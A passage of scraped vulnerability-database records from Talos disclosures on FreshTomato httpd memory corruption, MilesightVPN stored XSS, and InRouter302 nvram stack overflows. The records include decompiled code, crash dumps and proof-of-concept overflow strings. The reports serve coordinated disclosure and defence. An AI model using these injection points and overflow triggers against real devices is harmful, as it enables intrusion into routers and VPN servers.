"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27656", "CVE-2020-27657"], "modified": "2020-10-29T00:00:00", "id": "TALOS-2020-1071", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1071", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-02T18:56:20", "description": "### Summary\n\nA memory corruption vulnerability exists in the httpd unescape functionality of FreshTomato 2022.1. A specially-crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability.\n\n### Tested Versions\n\nFreshTomato 2022.1\n\n### Product URLs\n\nFreshTomato - <https://www.freshtomato.org/>\n\n### CVSSv3 Score\n\n5.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n\n### CWE\n\nCWE-20 - Improper Input Validation\n\n### Details\n\nFreshTomato is an open source firmware based on linux. The firmware offers several features for Broadcom-based routers.\n\nThe FreshTomato\u2019s httpd component has a file named `cgi.c` that contains CGI helper functions. One of these functions is `unescape`:\n \n \n static void unescape(char *s)\n {\n unsigned int c;\n \n while ((s = strpbrk(s, \"%+\"))) { [1]\n if (*s == '%') {\n sscanf(s + 1, \"%02x\", &c); [2]\n *s++ = (char) c; [3]\n strcpy(s, s + 2); [4]\n }\n else if (*s == '+') {\n *s++ = ' ';\n }\n }\n }\n \n\nThis function takes as argument a string. If URL-encoded, this function will decode it. At `[1]`, there is a loop that takes the next `%` or `+` in the string. If a `%` is found, then at `[2]` the following two characters are converted from hex values to a single character. At `[3]` the converted character replaces the `%` character and the string pointer advance. At `[4]` the string, after the already-parsed URL-encoded character is moved left by two positions, will replace the parsed characters. A string like \u201cA\u2026B%41%42\u201d would go through the following steps:\n \n \n |A|...|B|%|4|1|%|4|2|NULL| at [1]/[2]\n |A|...|B|A|4|1|%|4|2|NULL| after [3]\n |A|...|B|A|%|4|2|NULL|2|NULL| after [4]\n \n\nEventually, after a second iteration of the loop, we would end up like this:\n \n \n |A|...|B|A|B|NULL|2|NULL|2|NULL| after [4]\n \n\n#### CVE-2022-28664 - mips branch - httpd unescape memory corruption\n\nThe `freshtomato-mips` has a vulnerable URL-decoding feature that can lead to memory corruption. The `unescape` function assumes, wrongly, that after a `%` there are always at least two characters. If this is not the case, the instruction at `[4]` would cause an out-of-bounds read and write.\n\n#### CVE-2022-28665 - arm branch - httpd unescape memory corruption\n\nThe `freshtomato-arm` has a vulnerable URL decoding feature that can lead to memory corruption. The `unescape` function assume, wrongly, that after a `%` there are always at least two characters. If this is not the case, the instruction at `[4]` would cause an out-of-bounds read and write.\n\n### Timeline\n\n2022-04-11 - Initial vendor contact \n2022-04-27 - Vendor Disclosure \n2022-05-06 - Vendor Patch Release \n2022-07-27 - Public Release \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-27T00:00:00", "type": "talos", "title": "FreshTomato httpd unescape memory corruption vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-28664", "CVE-2022-28665"], "modified": "2022-07-27T00:00:00", "id": "TALOS-2022-1509", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1509", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T19:04:36", "description": "# Talos Vulnerability Report\n\n### TALOS-2023-1704\n\n## Milesight MilesightVPN requestHandlers.js detail_device cross-site scripting (XSS) vulnerabilities\n\n##### July 6, 2023\n\n##### CVE Number\n\nCVE-2023-24497,CVE-2023-24496\n\n##### SUMMARY\n\nCross-site scripting (xss) vulnerabilities exist in the requestHandlers.js detail_device functionality of Milesight VPN v2.0.2. A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger these vulnerabilities.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight VPN v2.0.2\n\n##### PRODUCT URLS\n\nMilesightVPN - <https://www.milesight-iot.com/milesightvpn/>\n\n##### CVSSv3 SCORE\n\n4.7 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N \n6.1 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - chain: TALOS-2023-1702\n\n##### CWE\n\nCWE-80 - Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)\n\n##### DETAILS\n\nThe MilesightVPN is a software that make easier the setup of VPN tunnel for the Milesight products and allow to monitor the connection status with a web server interface.\n\nThe MilesightVPN exposes the `/Device_Auth` API used to authenticate to the server and to get the an OpenVPN configuration file. This API is for the various Milesight devices, the API requires as data the serial number, the authentication code, the device name and the subnet of the device. Essentially the API expects four entries in the POST payload:\n\n * authcode: is a secret generated by the MilesightVPN\n * subnet: the subnet mask of the main network used by the device\n * device_name: the identifier of the device that is connecting to the MilesightVPN server\n * sn: is the serial number of the device that is connecting to the MilesightVPN server\n\nAfter been registered, the device will appear in the Device table showing the provided information. This Device table is in the landing page after the login.\n\nFollowing the relevant portion of the Embedded JavaScript template related to the device table:\n \n \n <table class=\"table table-no-bordered\" data-striped=\"true\" data-height=\"100%\" id=\"tbl_content\" data-toggle=\"table\" data-url=\"/detail_device\" data-target=\"/detail_device\" data-id-field=\"sn\" data-pagination=\"true\" data-sort-stable=\"true\" data-sort-name=\"connect_time\" data-sort-order=\"asc\" data-toolbar=\"#deviceToolbar\" data-search=\"true\" data-search-on-enter-key=\"true\" data-cache=\"false\">\n <thead>\n <tr>\n <th data-field=\"name\" data-width=\"15%\" data-sortable=\"true\" data-formatter=\"name_formatter\"><%=lang.detail.device.name%></th>\n <th data-field=\"status\" data-width=\"10%\" data-sortable=\"true\" data-formatter=\"status_formatter\"><%=lang.detail.device.status%></th>\n <th data-field=\"sn\" data-width=\"10%\" data-sortable=\"true\"><%=lang.detail.device.sn%></th>\n <th data-field=\"virtual_ip\" data-width=\"15%\" data-sortable=\"true\"><%=lang.detail.device.virtualip%></th>\n <th data-field=\"real_ip\" data-width=\"15%\" data-sortable=\"true\"><%=lang.detail.device.realip%></th>\n <th data-field=\"remote_subnet\" data-width=\"15%\" data-sortable=\"true\" data-formatter=\"subnet_formatter\"><%=lang.detail.device.subnet%></th>\n <th data-field=\"connect_time\" data-width=\"15%\" data-sortable=\"true\" data-formatter=\"time_formatter\"><%=lang.detail.device.time%></th>\n <th data-field=\"history\" data-width=\"10%\" data-formatter=\"history_formatter\"><%=lang.detail.device.history%></th>\n </tr>\n </thead>\n \n\nThe data of this table is filled using the `requestHandlers.js`\u2019s `detail_device` function:\n \n \n function detail_device(res,postdata,connection){\n var $sql=\"select * from device\";\n $sql+=' left join ';\n $sql+=' (select count(*) as total,remote_subnet from device group by remote_subnet) repeatsubnet on repeatsubnet.remote_subnet=device.remote_subnet';\n var result={};\n connection.query($sql).then(function(data){\n if(data['error'])\n {\n res.write(JSON.stringify(result));\n res.end();\n }\n else\n {\n if(data['result'].length>0)\n {\n result=JSON.stringify(data['result']);\n res.writeHead(200,{'Content-Type':'application/json','Content-length':Buffer.byteLength(result, 'utf8')});\n res.write(result);\n res.end();\n }\n else\n {\n res.write(JSON.stringify([]));\n res.end();\n }\n }\n });\n }\n \n\nThe `device` table has the following schema:\n \n \n +---------------+--------------+------+-----+---------+-------+\n | Field | Type | Null | Key | Default | Extra |\n +---------------+--------------+------+-----+---------+-------+\n | name | varchar(255) | YES | | NULL | |\n | sn | varchar(12) | NO | PRI | NULL | |\n | virtual_ip | varchar(15) | YES | | NULL | |\n | real_ip | varchar(32) | YES | | NULL | |\n | remote_subnet | varchar(32) | YES | | NULL | |\n | connect_time | int | YES | | NULL | |\n | status | int | YES | | NULL | |\n +---------------+--------------+------+-----+---------+-------+\n \n\nThe `device` table is populated through the registered devices, so through the `/Device_Auth` API.\n\nFrom when a Milesight device is registered, using the `/Device_Auth` API, until showing its data in the web interface, no checks about the data are performed, this can lead an XSS vulnerability. An attacker can upload malicious Javascript code through the `/Device_Auth` API, registering a device. An admin of the server would execute this malicious javascript whenever they viewed the details page due to the stored XSS. An attacker would need to know the Authorization Code of the server to actually use the `/Device_Auth` API. But because TALOS-2023-1702 this information can be easily retrieved by an attacker.\n\n#### CVE-2023-24496 - XSS in the name field\n\nAn attacker can upload malicious Javascript code through the `/Device_Auth`\u2019s `device_name` parameter. The `device_name` value will be stored in the `device` database as the `name` field.\n\n#### CVE-2023-24497 - XSS in the remote_subnet field\n\nAn attacker can upload malicious Javascript code through the `/Device_Auth`\u2019s `subnet` parameter. The `subnet` value will be stored in the `device` database as the `remote_subnet` field.\n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1740\n\nPrevious Report\n\nTALOS-2023-1703\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.7, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight MilesightVPN requestHandlers.js detail_device cross-site scripting (XSS) vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-24496", "CVE-2023-24497"], "modified": "2023-07-06T00:00:00", "id": "TALOS-2023-1704", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1704", "cvss": {"score": 4.0, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-12-02T18:56:28", "description": "### Summary\n\nMultiple improper input validation vulnerabilities exists in the libnvram.so nvram_import functionality of InHand Networks InRouter302 V3.5.4. A specially-crafted file can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.\n\n### Tested Versions\n\nInHand Networks InRouter302 V3.5.4\n\n### Product URLs\n\nInRouter302 - <https://www.inhandnetworks.com/products/inrouter300.html>\n\n### CVSSv3 Score\n\n9.9 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\n\n### CWE\n\nCWE-20 - Improper Input Validation\n\n### Details\n\nThe InRouter302 is an industrial LTE router. It features remote management functionalities and several security protection mechanism, such as: VPN technologies, firewall functionalities, authorization management and several other features.\n\nThe inRouter302 extensively uses a library called `libnvram.so`. This library is used, among the other things, to manipulate the nvram related data. One of the function of the web server that uses the library is called `upload.cgi_output`:\n \n \n void upload.cgi_output(void)\n \n {\n [...]\n \n type = (char *)webcgi_get(\"type\"); [1]\n filename = (char *)webcgi_get(\"filename\"); [2]\n if ((type == (char *)0x0) || (*type == '\\0')) {\n [...]\n }\n else {\n if ((filename != (char *)0x0) && (*filename != '\\0')) {\n syslog(7,\"filename: %s...\",filename);\n [...]\n iVar1 = strcasecmp(type,\"config\");\n if (iVar1 != 0) {\n [...]\n }\n syslog(7,\"import config...\");\n iVar1 = nvram_import(filename); [3]\n [...]\n }\n [...]\n }\n \n\nA function called before `upload.cgi_output` parses the request, including the `type` and `filename` variables. Then `upload.cgi_output` fetches the parsed variable `type` and `filename`, respectively, at `[1]` and `[2]`. If the uploaded file is of the \u201cconfiguration\u201d `type`, eventually, the code at `[3]` is reached, and `nvram_import` called. The `libnvram.so`\u2019s `nvram_import` function will take the provided file, parse it, and update the new nvram configuration accordingly.\n\nThe `libnvram.so` has a function called `validate`:\n \n \n undefined4 validate(char *key_to_change,char *new_value)\n \n {\n [...]\n \n if (new_value == (char *)0x0) {\n new_value = \"\";\n }\n opt_value = opt_validates;\n nvram_key = \"language\";\n do {\n iVar1 = strcmp(nvram_key,key_to_change);\n if (iVar1 == 0) {\n ret_code = (*(code *)opt_value->validation_function)\n (opt_value->min_length,opt_value->max_length,opt_value->select_values,\n new_value);\n return ret_code;\n }\n opt_value = opt_value + 1;\n nvram_key = opt_value->nvram_key;\n } while (nvram_key != (char *)0x0);\n syslog(7,\"var %s = %s is unknown!\",key_to_change,new_value);\n return 0xffffffff;\n }\n \n\nThis function is called with two arguments: the nvram entry\u2019s key to change and its new value. This function will check, based on the key, if the new value respects certain criteria. The caller will then, based on the result, change the entry value or not. The `validate` function is used for a set of nvram keys. Instead, the `nvram_import`, among the values that are allowed to be changed, does not validate the entries\u2019 values. This can invalidate some assumptions made across the other binaries that use the nvram values, and can lead to code execution.\n\n#### CVE-2022-26780 - httpd\u2019s user_define_init stack-based buffer overflow\n\nAn improper input validation vulnerability exists in the `httpd`\u2019s `user_define_init` function. Controlling the `user_define_timeout` nvram variable can lead to remote code execution.\n\nThe `user_define_init`:\n \n \n int user_define_init(timeout_struct *timeout_struct)\n \n {\n char *user_define_timeouts;\n int idx;\n char service_name [64];\n undefined4 service_timeout [3];\n \n idx = 0;\n memset(service_name,0,0x40);\n service_timeout[0] = 0;\n memset(timeout_struct,0,0x1a90);\n user_define_timeouts = (char *)nvram_default_get(\"user_define_timeout\",0);\n if ((user_define_timeouts != (char *)0x0) &&\n (user_define_timeouts = strtok(user_define_timeouts,\",\"), user_define_timeouts != (char *)0x0))\n {\n do {\n while( true ) {\n sscanf(user_define_timeouts,\"%[^:]:%d\",service_name,service_timeout); [4]\n if (service_name[0] != '\\0') break;\n user_define_timeouts = strtok((char *)0x0,\",\");\n if (user_define_timeouts == (char *)0x0) {\n return idx;\n }\n }\n user_define_timeouts = strcpy(timeout_struct[idx].service_name,service_name);\n idx = idx + 1;\n *(undefined4 *)(user_define_timeouts + 0x40) = service_timeout[0];\n user_define_timeouts = strtok((char *)0x0,\",\");\n } while (user_define_timeouts != (char *)0x0);\n }\n return idx;\n }\n \n\nThe nvram variable called `user_define_timeout` is a comma separated string. The value between the commas is of the form `<service_name>:<value>`. The `service_name` should be of the form `user_define_XX` where `XX` range from `00` to `99`. But someone that can control the `user_define_timeout` nvram variable can place whatever value he wants. If the `service_name` provided has more than 64 bytes, a stack-based buffer overflow would occur at `[4]`. This can lead to code execution.\n\n#### Crash Information\n \n \n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n $a1 : 0x00466b40 \u2192 0x0000002c (\",\"?)\n $a2 : 0x0\n $a3 : 0x0\n $t0 : 0x0\n $t1 : 0xffffffff\n $t2 : 0x77750000 \u2192 0x464c457f\n $t3 : 0xf0000000\n $t4 : 0x1\n $t5 : 0x7763e768 \u2192 0x00000000\n $t6 : 0x77643a48 \u2192 0x6c5f5f00\n $t7 : 0x0040f7d4 \u2192 0x00002021 (\"! \"?)\n $s0 : 0x41414141 (\"AAAA\"?)\n $s1 : 0x41414141 (\"AAAA\"?)\n $s2 : 0x41414141 (\"AAAA\"?)\n $s3 : 0x41414141 (\"AAAA\"?)\n $s4 : 0x41414141 (\"AAAA\"?)\n $s5 : 0x42424242 (\"BBBB\"?)\n $s6 : 0x00460000 \u2192 0xafb30024 (\"$\"?)\n $s7 : 0x2\n $t8 : 0x283\n $t9 : 0x7766ec00 \u2192 <strspn+0> move v0, zero\n $k0 : 0x0\n $k1 : 0x0\n $s8 : 0x0047e938 \u2192 \"user_define_01\"\n $pc : 0x0040f7c4 \u2192 <user_define_init+308> jr ra\n $sp : 0x7faf7208 \u2192 0x00000000\n $hi : 0x19e\n $lo : 0x1e78d\n $fir : 0x0\n $ra : 0x41414141 (\"AAAA\"?)\n $gp : 0x484d90\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n 0x7faf7208\u2502+0x0000: 0x00000000 \u2190 $sp\n 0x7faf720c\u2502+0x0004: 0x00000000\n 0x7faf7210\u2502+0x0008: 0x7faf7220 \u2192 \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n 0x7faf7214\u2502+0x000c: 0x7faf7260 \u2192 0x00000001\n 0x7faf7218\u2502+0x0010: 0x00484d90\n 0x7faf721c\u2502+0x0014: 0x00000000\n 0x7faf7220\u2502+0x0018: \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n 0x7faf7224\u2502+0x001c: \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:mips:MIPS32 \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n 0x40f7b8 <user_define_init+296> lw s2, 108(sp)\n 0x40f7bc <user_define_init+300> lw s1, 104(sp)\n 0x40f7c0 <user_define_init+304> lw s0, 100(sp)\n \u2192 0x40f7c4 <user_define_init+308> jr ra\n [!] Cannot disassemble from $PC\n \n\n#### Exploit Proof of Concept\n\nIf in the nvram configuration is defined as `user_define_timeout=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:1` and then the code at `[4]` is reached, the `httpd` binary would exhibit the crash shown above. The return address register, `ra`, has value 0x41414141.\n\n#### CVE-2022-26781 - httpd\u2019s user_define_print stack-based buffer overflow\n\nAn improper input validation vulnerability exists in the `httpd`\u2019s `user_define_print` function. Controlling the `user_define_timeout` nvram variable can lead to remote code execution.\n\nThe `user_define_print` function:\n \n \n undefined4 user_define_print(timeout_struct *timeout_struct)\n \n {\n timeout_struct *timeout_struct_cursor;\n timeout_struct *ptVar2;\n char user_define_timeout [3200];\n char temp_define_timeout [32];\n \n temp_define_timeout._0_4_ = 0;\n temp_define_timeout._4_4_ = 0;\n temp_define_timeout._8_4_ = 0;\n temp_define_timeout._12_4_ = 0;\n temp_define_timeout._16_4_ = 0;\n temp_define_timeout._20_4_ = 0;\n temp_define_timeout._24_4_ = 0;\n temp_define_timeout._28_4_ = 0;\n memset(user_define_timeout,0,0xc80);\n timeout_struct_cursor = timeout_struct;\n do {\n while (timeout_struct_cursor->service_name[0] != '\\0') {\n next_entry = timeout_struct_cursor + 1;\n sprintf(temp_define_timeout,\"%s:%d,\",timeout_struct_cursor,timeout_struct_cursor->value); [5]\n strcat(user_define_timeout,temp_define_timeout);\n timeout_struct_cursor = next_entry;\n if (next_entry == timeout_struct + 100) goto FUNCTON_END;\n }\n timeout_struct_cursor = timeout_struct_cursor + 1;\n } while (timeout_struct_cursor != timeout_struct + 100);\n FUNCTON_END:\n [...]\n }\n \n\nThe nvram variable called `user_define_timeout` is a comma separated string. The value between the commas is of the form `<service_name>:<value>`. The `service_name` should be of the form `user_define_XX` where `XX` range from `00` to `99`. But someone that can control the `user_define_timeout` nvram variable can place whatever value he wants. If the `service_name` provided has more than 32 bytes, a stack-based buffer overflow would occur at `[5]`. This can lead to code execution.\n\n#### Crash Information\n \n \n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n $zero: 0x0\n $at : 0x7fcc9a46 \u2192 0x4c707fcc\n $v0 : 0x0\n $v1 : 0x3f\n $a0 : 0x1\n $a1 : 0x0\n $a2 : 0x1\n $a3 : 0x0\n $t0 : 0x0\n $t1 : 0x87fa118c\n $t2 : 0x8000\n $t3 : 0x0\n $t4 : 0x5d6\n $t5 : 0x87fa11d8\n $t6 : 0x8693dd1e\n $t7 : 0x10000\n $s0 : 0x41414141 (\"AAAA\"?)\n $s1 : 0x41414141 (\"AAAA\"?)\n $s2 : 0x41414141 (\"AAAA\"?)\n $s3 : 0x41414141 (\"AAAA\"?)\n $s4 : 0x41414141 (\"AAAA\"?)\n $s5 : 0x0047e938 \u2192 \"user_define_00\"\n $s6 : 0x00460000 \u2192 0xafb30024 (\"$\"?)\n $s7 : 0x2\n $t8 : 0x10\n $t9 : 0x00462af0 \u2192 0x8f998010\n $k0 : 0x0\n $k1 : 0x0\n $s8 : 0x0047e938 \u2192 \"user_define_00\"\n $pc : 0x0040f914 \u2192 <user_define_print+268> jr ra\n $sp : 0x7fcc9ab8 \u2192 0x00000000\n $hi : 0x1d\n $lo : 0x89af0400\n $fir : 0x0\n $ra : 0x41414141 (\"AAAA\"?)\n $gp : 0x484d90\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n 0x7fcc9ab8\u2502+0x0000: 0x00000000 \u2190 $sp\n 0x7fcc9abc\u2502+0x0004: 0x00000000\n 0x7fcc9ac0\u2502+0x0008: 0x7fcca7e4 \u2192 \"user_define_00\"\n 0x7fcc9ac4\u2502+0x000c: 0x00000000\n 0x7fcc9ac8\u2502+0x0010: 0x00484d90\n 0x7fcc9acc\u2502+0x0014: 0x00000000\n 0x7fcc9ad0\u2502+0x0018: \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n 0x7fcc9ad4\u2502+0x001c: \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:mips:MIPS32 \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n 0x40f908 <user_define_print+256> lw s2, 3264(sp)\n 0x40f90c <user_define_print+260> lw s1, 3260(sp)\n 0x40f910 <user_define_print+264> lw s0, 3256(sp)\n \u2192 0x40f914 <user_define_print+268> jr ra\n [!] Cannot disassemble from $PC\n \n\n#### Exploit Proof of Concept\n\nIf in the nvram configuration is defined as `user_define_timeout=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:1` and then the code at `[5]` is reached, the `httpd` binary would exhibit the crash shown above. The return address register, `ra`, has value 0x41414141.\n\n#### CVE-2022-26782 - httpd\u2019s user_define_set_item stack-based buffer overflow\n\nAn improper input validation vulnerability exists in the `httpd`\u2019s `user_define_set_item` function. Controlling the `user_define_timeout` nvram variable can lead to remote code execution.\n \n \n undefined4 user_define_set_item(cgi_table_entry *cgi_entry,dword value)\n \n {\n [...]\n timeout_struct timeout_struct [100];\n \n total_entries = user_define_init(timeout_struct); [6]\n [...]\n }\n \n\nThe `user_define_set_item` has an array of `timeout_struct` of 100 elements. The `user_define_init` will parse the data contained in `user_define_timeout` and fill the array:\n \n \n int user_define_init(timeout_struct *timeout_struct)\n \n {\n char *user_define_timeouts;\n int idx;\n char service_name [64];\n undefined4 service_timeout [3];\n \n idx = 0;\n memset(service_name,0,0x40);\n service_timeout[0] = 0;\n memset(timeout_struct,0,0x1a90);\n user_define_timeouts = (char *)nvram_default_get(\"user_define_timeout\",0);\n if ((user_define_timeouts != (char *)0x0) &&\n (user_define_timeouts = strtok(user_define_timeouts,\",\"), user_define_timeouts != (char *)0x0))\n {\n do {\n while( true ) {\n sscanf(user_define_timeouts,\"%[^:]:%d\",service_name,service_timeout); [8]\n if (service_name[0] != '\\0') break;\n user_define_timeouts = strtok((char *)0x0,\",\");\n if (user_define_timeouts == (char *)0x0) {\n return idx;\n }\n }\n user_define_timeouts = strcpy(timeout_struct[idx].service_name,service_name);\n idx = idx + 1;\n *(undefined4 *)(user_define_timeouts + 0x40) = service_timeout[0];\n user_define_timeouts = strtok((char *)0x0,\",\");\n } while (user_define_timeouts != (char *)0x0);\n }\n return idx;\n }\n \n\nThe nvram variable called `user_define_timeout` is a comma separated string. The value between the commas is of the form `<service_name>:<value>`. The `service_name` should be of the form `user_define_XX` where `XX` range from `00` to `99`. But someone that can control the `user_define_timeout` nvram variable can place whatever value he wants. The function `user_define_init` does not control how many commas are present in the `user_define_timeout` variable. This means that if there are 100 commas, the parsing of `<service_name>:<value>`, at `[8]`, will be perfomed out of bounds of the stack array. This can cause a stack-based buffer overflow in the `user_define_set_item`\u2019s stack frame, and can lead to code execution.\n\n#### Crash Information\n \n \n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers 